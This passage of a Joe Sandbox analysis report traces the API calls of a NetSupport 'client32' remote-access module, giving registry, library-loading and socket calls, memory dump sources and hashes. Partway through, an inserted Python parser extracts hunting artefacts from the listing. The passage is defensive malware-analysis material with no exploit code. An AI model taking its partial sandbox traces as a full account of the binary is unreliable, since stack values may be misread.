  • Part of subcall function 11096C50: EqualSid.ADVAPI32(?,0109D280,?,00000001,00000001), ref: 11096CE3
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 11096D67
Memory Dump Source
• Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
• String ID:
• API String ID: 2256153495-0
                                                        • Opcode ID: db81ee2fe5c491a2ccb29379fd95f1d0d1d742c7a3d4049ea7660b541be06c1b
                                                        • Instruction ID: bef03fc96a11baf82ef458017e705a3ff4e764ad3467957e138692709f696853
                                                        • Opcode Fuzzy Hash: db81ee2fe5c491a2ccb29379fd95f1d0d1d742c7a3d4049ea7660b541be06c1b
                                                        • Instruction Fuzzy Hash: 6FF082B6E02218AFCB04DFB4ECC899EF7B8EB092087508079F82AC3205E635D900DF54
                                                        APIs
                                                        • InitializeCriticalSection.KERNEL32(111DC098,82E0FB89,?,?,?,?,-00000001,1116FF88,000000FF,?,11102CF8,00000001,?,11158063,?), ref: 11102C54
                                                        • EnterCriticalSection.KERNEL32(111DC098,82E0FB89,?,?,?,?,-00000001,1116FF88,000000FF,?,11102CF8,00000001,?,11158063,?), ref: 11102C70
                                                        • LeaveCriticalSection.KERNEL32(111DC098,?,?,?,?,-00000001,1116FF88,000000FF,?,11102CF8,00000001,?,11158063,?), ref: 11102CB8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                        • String ID:
                                                        • API String ID: 3991485460-0
                                                        • Opcode ID: 21aed678011e1edbc94f63bc384b6260687119dd637fa6182ef04eff418a5b30
                                                        • Instruction ID: af8f5faaa0e43fc37bf2fbcfa483d918300548e7e4694db782cc55eb6f48ea86
                                                        • Opcode Fuzzy Hash: 21aed678011e1edbc94f63bc384b6260687119dd637fa6182ef04eff418a5b30
                                                        • Instruction Fuzzy Hash: 5C11C679A05314AFDB108F95CA88BDEF7A8FB46618F40472DEC12A3340DB75580087A1
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11064212
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: ??CTL32.DLL
                                                        • API String ID: 1029625771-2984404022
                                                        • Opcode ID: cc0ca063087fa356a0713f1d8e18f8b0dc33c2edb3546a523657c24588211f68
                                                        • Instruction ID: 40d8bc6ab88db45c32dcc04311cf02eaab8fe64a48e70e25efc52a4fcd913f6e
                                                        • Opcode Fuzzy Hash: cc0ca063087fa356a0713f1d8e18f8b0dc33c2edb3546a523657c24588211f68
                                                        • Instruction Fuzzy Hash: 0B31F371A04786DFEB10CF18DC40B5ABBE8FB46324F0182AAE918DB380E731A800C791
                                                        APIs
                                                        • GetDriveTypeA.KERNEL32(?), ref: 110258CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID: ?:\
                                                        • API String ID: 338552980-2533537817
                                                        • Opcode ID: 8a1c97ff2a0bb620fb07ae8eb7adef0309c76a6bd9ef81c874dd3ea24fd5b682
                                                        • Instruction ID: 296434f9c912465af49bf9801cd890ec27f2c7e8f645fe9e776db7a9ee79c680
                                                        • Opcode Fuzzy Hash: 8a1c97ff2a0bb620fb07ae8eb7adef0309c76a6bd9ef81c874dd3ea24fd5b682
                                                        • Instruction Fuzzy Hash: 14F0B461C053D97AEB22CE6084445C6BFE84F07269F64C8DEE8DA96541E2F6E184CB91
                                                        APIs
                                                          • Part of subcall function 110E2100: RegCloseKey.ADVAPI32(?,00000000,?,110E214D,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E210D
                                                        • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E215C
                                                          • Part of subcall function 110E1EE0: wvsprintfA.USER32(?,00020019,?), ref: 110E1F0B
                                                        Strings
                                                        • Error %d Opening regkey %s, xrefs: 110E216A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenwvsprintf
                                                        • String ID: Error %d Opening regkey %s
                                                        • API String ID: 1772833024-3994271378
                                                        • Opcode ID: de06c068b6387fb7d03cac4f1ec7eec17ce79ab7c81d58fa8930de2aa0461511
                                                        • Instruction ID: 3b3bc7d0e1a8f125228a4b9cdcbe5750d81a716439a92490548d771633bd724e
                                                        • Opcode Fuzzy Hash: de06c068b6387fb7d03cac4f1ec7eec17ce79ab7c81d58fa8930de2aa0461511
                                                        • Instruction Fuzzy Hash: B4E0927A7012183FD710961A9C84EEBBB5DDBD66A8F00002AFA0487341C971DD0082B0
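The entries in this listing record each call as `Name.MODULE(arg,arg,...), ref: ADDRESS`, with the values in parentheses being the stack slots Joe Sandbox saw at the call site. The following is an added example, not part of the Joe Sandbox report or of the NetSupport client32 module it describes: a small parser that turns those bullet lines into records, rebases every `ref` against the two image bases given in the report's Memory Dump Source lines (11000000 and 6C800000) so the call site can be found after loading the dumped module in a disassembler, and collects the literal, non-numeric arguments (the `SOFTWARE\Policies\NetSupport\Client\standard` policy key, `NSMTRACE`, `psapi.dll`) as host artefacts to hunt for. The regular expression is my reading of the line shapes shown on this page; the sample lines are copied from this listing, and the `IOCTL_CMDS` table holds standard Winsock constants, not values from the report.

```python
"""Parse the "APIs" bullet lines of a Joe Sandbox function listing.

Added example; not part of the Joe Sandbox report or of the NetSupport
client32 module it describes. Each bullet has the shape
    Name.MODULE(arg,arg,...), ref: ADDRESS
optionally prefixed by "Part of subcall function ADDR:". The parser
turns these into records, rebases the ref against the image bases the
report gives in its "Memory Dump Source" lines, and collects literal
(non-numeric) arguments as host artefacts worth hunting for.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Image bases from the report's "Offset: 11000000" / "Offset: 6C800000"
# lines. Any further module is an assumption the analyst has to add.
IMAGE_BASES = {
    0x11000000: "hcaresult_11_2_11000000_client32.jbxd",
    0x6C800000: "hcaresult_11_2_6c800000_client32.jbxd",
}

# Winsock ioctlsocket command codes (standard constants, not from the report).
IOCTL_CMDS = {0x4004667F: "FIONREAD", 0x8004667E: "FIONBIO"}

API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>[A-Za-z0-9]+)"   # e.g. std::exception::exception.LIBCMT
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Joe Sandbox prints stack slots as 8 hex digits (optionally negative) or "?".
HEX_ARG = re.compile(r"^-?[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int]
    base: Optional[int]

    @property
    def rva(self) -> Optional[int]:
        """Offset of the call site inside its module, usable after rebasing in a disassembler."""
        return None if self.base is None else self.ref - self.base

    @property
    def literal_args(self) -> List[str]:
        """Arguments that are neither '?' nor raw stack values: strings the binary carries."""
        return [a for a in self.args if a != "?" and not HEX_ARG.match(a)]


def base_for(addr: int) -> Optional[int]:
    """Largest known image base at or below addr (None if the address is in no known module)."""
    below = [b for b in IMAGE_BASES if b <= addr]
    return max(below) if below else None


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    # Arguments on this page contain no commas, so a plain split is safe here.
    args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
    ref = int(m["ref"], 16)
    sub = int(m["sub"], 16) if m["sub"] else None
    return ApiCall(m["api"], m["mod"], args, ref, sub, base_for(ref))


def parse_listing(text: str) -> List[ApiCall]:
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c is not None]


def hunt_strings(calls: List[ApiCall]) -> List[str]:
    """Deduplicated literal arguments in first-seen order."""
    out: List[str] = []
    for c in calls:
        for a in c.literal_args:
            if a not in out:
                out.append(a)
    return out


def decode_ioctl_cmd(call: ApiCall) -> Optional[str]:
    """Name the cmd argument (second slot) of an ioctlsocket call."""
    if call.api != "ioctlsocket" or len(call.args) < 2 or not HEX_ARG.match(call.args[1]):
        return None
    return IOCTL_CMDS.get(int(call.args[1], 16), "unknown")


# Lines copied from the listing above (constructed sample input for this example).
SAMPLE_LISTING = r"""  • Part of subcall function 110E2100: RegCloseKey.ADVAPI32(?,00000000,?,110E214D,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E210D
• RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E215C
• LoadLibraryA.KERNEL32(NSMTRACE,?,1102C5F4,110252E0,02D0B7D8,?,?,?,00000100,?,?,00000009), ref: 11135679
• LoadLibraryA.KERNEL32(psapi.dll,?,6C807708), ref: 6C803A78
• ioctlsocket.WSOCK32(937B54B7,4004667F,00000000,-000391A4), ref: 6C8047DF
• _memset.LIBCMT ref: 1106F94F
• std::exception::exception.LIBCMT ref: 1105B563
"""

if __name__ == "__main__":
    calls = parse_listing(SAMPLE_LISTING)
    for c in calls:
        off = f"+{c.rva:05X}" if c.rva is not None else "?"
        print(f"{c.ref:08X} ({off}) {c.api}.{c.module} {c.literal_args}")
    print("hunt for:", hunt_strings(calls))
```

Two caveats when reading the output. The hex values in parentheses are whatever was on the stack at the call, so a value may be a pointer or a saved register rather than the parameter itself; the literal strings are the dependable part of each entry, which is why only they are collected for hunting. The second slot of the `ioctlsocket` call at 6C8047DF, 4004667F, is the standard FIONREAD code, so that function polls a socket for pending bytes before the `select` that follows it.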
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(NSMTRACE,?,1102C5F4,110252E0,02D0B7D8,?,?,?,00000100,?,?,00000009), ref: 11135679
                                                          • Part of subcall function 111349D0: GetModuleHandleA.KERNEL32(NSMTRACE,11182A50), ref: 111349EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: HandleLibraryLoadModule
                                                        • String ID: NSMTRACE
                                                        • API String ID: 4133054770-4175627554
                                                        • Opcode ID: 6b55861aefcc65c005b9025e5622ee65095013122b0b6ef497348b2382dd5a01
                                                        • Instruction ID: b1ad380a61c778eddec6c5cf27d69e9270adaa7b109430301fabde4c5aba83a6
                                                        • Opcode Fuzzy Hash: 6b55861aefcc65c005b9025e5622ee65095013122b0b6ef497348b2382dd5a01
                                                        • Instruction Fuzzy Hash: 4BD012766552178BCF555A59A458764F7A8A64551F3400479DC25D5608EB30E0008F50
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,1102E824), ref: 11024B28
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: psapi.dll
                                                        • API String ID: 1029625771-80456845
                                                        • Opcode ID: b279cfa9485dd3d843c5fad48a844f53d245e61bccd7eeaeb87f5d1cde24b26e
                                                        • Instruction ID: a49634711d735b4a264a9b105b6216e45b9c68ec107dc904bdc89f91bbe56f72
                                                        • Opcode Fuzzy Hash: b279cfa9485dd3d843c5fad48a844f53d245e61bccd7eeaeb87f5d1cde24b26e
                                                        • Instruction Fuzzy Hash: 43E009B1901B108FC3B0CF3A9844642BBF0FB086503118E3EE0AEC3A00E330A548CF90
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,6C807708), ref: 6C803A78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: psapi.dll
                                                        • API String ID: 1029625771-80456845
                                                        • Opcode ID: 626af475e0b489b49d0607378075431aad060d740aaea553ee34b5ccd583b844
                                                        • Instruction ID: 09e6a29e0cb649e0a62b1af69a353f073a8e0e002372db9d57f7144f4071e6c6
                                                        • Opcode Fuzzy Hash: 626af475e0b489b49d0607378075431aad060d740aaea553ee34b5ccd583b844
                                                        • Instruction Fuzzy Hash: D5E001B1A01B218F83B0CF7AA504646BAF0BB096103119E3ED09EC3B00E334AA458FC0
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 1105B563
                                                        • __CxxThrowException@8.LIBCMT ref: 1105B578
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                        • String ID:
                                                        • API String ID: 1338273076-0
                                                        • Opcode ID: 1b5560830ccb74d44574dce0668a09696c272e29ec4a79bf687cb658f92f3a9e
                                                        • Instruction ID: dbfd585634f4dcca31f1a65116c528cbeeec74a75ffab873033d2eb26059fac1
                                                        • Opcode Fuzzy Hash: 1b5560830ccb74d44574dce0668a09696c272e29ec4a79bf687cb658f92f3a9e
                                                        • Instruction Fuzzy Hash: 1F51BF76A00649AFCB44CF58D840E9AFBE9EF49314F14856EEC199B340D775F900CBA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 1106F94F
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11182201,?), ref: 1106F9B9
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeLibrary_memset
                                                        • String ID:
                                                        • API String ID: 1654520187-0
                                                        • Opcode ID: 236fcb1ff3e935db34e9d19d6ac7a4d3679b670c088639da643021d7e105519a
                                                        • Instruction ID: b4d7e124ec2e4c11198bc400b01424f54d7072c10aa60f823e9ba30096ca7848
                                                        • Opcode Fuzzy Hash: 236fcb1ff3e935db34e9d19d6ac7a4d3679b670c088639da643021d7e105519a
                                                        • Instruction Fuzzy Hash: BD218676E0021CA7D710DE95DC40BDFFBACFB59350F4045AAE90997200D7315A55CBE1
                                                        APIs
                                                        • ioctlsocket.WSOCK32(937B54B7,4004667F,00000000,-000391A4), ref: 6C8047DF
                                                        • select.WSOCK32(00000001,?,00000000,?,00000000,937B54B7,4004667F,00000000,-000391A4), ref: 6C804822
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: ioctlsocketselect
                                                        • String ID:
                                                        • API String ID: 1457273030-0
                                                        • Opcode ID: 695f85a805a316685ddb4345295488aeb6e3e4730592b991ba20b949c8d8252d
                                                        • Instruction ID: b4ebac9079f1e09069603cf0878cfa26b8ddb73d7b574f1c670d4e2319e97719
                                                        • Opcode Fuzzy Hash: 695f85a805a316685ddb4345295488aeb6e3e4730592b991ba20b949c8d8252d
                                                        • Instruction Fuzzy Hash: 62213371A002188BEB28CF18C9547DDB7B9EB85304F0085EAA40D9B641D7745F94CF90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _malloc_memmove
                                                        • String ID:
                                                        • API String ID: 1183979061-0
                                                        • Opcode ID: 3c3ea54d01e18f5980f76814a4a1cb213ace576d82b2a0984105e2d45a008ece
                                                        • Instruction ID: 6b2ba473f0f9fecf01fc659cc140292f3dfe021f1a80db6f3ab8bc208d22101f
                                                        • Opcode Fuzzy Hash: 3c3ea54d01e18f5980f76814a4a1cb213ace576d82b2a0984105e2d45a008ece
                                                        • Instruction Fuzzy Hash: 5DF0A479A00252AF97818F2D9844C97BBDCDF4A15C30484A6F955CB312D631ED0587E0
                                                        APIs
                                                        • _memset.LIBCMT ref: 11082CBF
                                                        • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106B543,00000000,00000000,1117066E,000000FF), ref: 11082D30
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
